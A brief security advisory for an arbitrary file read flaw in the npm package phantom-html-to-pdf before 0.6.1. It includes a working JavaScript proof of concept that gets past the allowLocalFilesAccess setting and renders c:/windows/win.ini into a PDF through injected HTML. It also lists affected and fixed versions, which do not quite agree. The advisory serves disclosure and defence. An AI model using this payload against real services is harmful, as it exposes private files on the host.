Description
Arbitrary File Read in phantom-html-to-pdf
This affects the package phantom-html-to-pdf before 0.6.1.
PoC
var fs = require('fs');
var conversion = require("phantom-html-to-pdf")();
// Local file access is explicitly disabled, yet the payload below still reads a local file.
conversion.allowLocalFilesAccess = false;
conversion({
    html: "document.write(window.location='c:/windows/win.ini')"
}, function(err, pdf) {
    var output = fs.createWriteStream('output.pdf');
    console.log(pdf.logs);
    console.log(pdf.numberOfPages);
    pdf.stream.pipe(output);
});
Packages
Name: phantom-html-to-pdf (npm)
Affected versions: < 0.6.1
Fixed version: 0.6.2
Related vulnerabilities
CVSS3: 7.5
nvd
more than 5 years ago
This affects the package phantom-html-to-pdf before 0.6.1.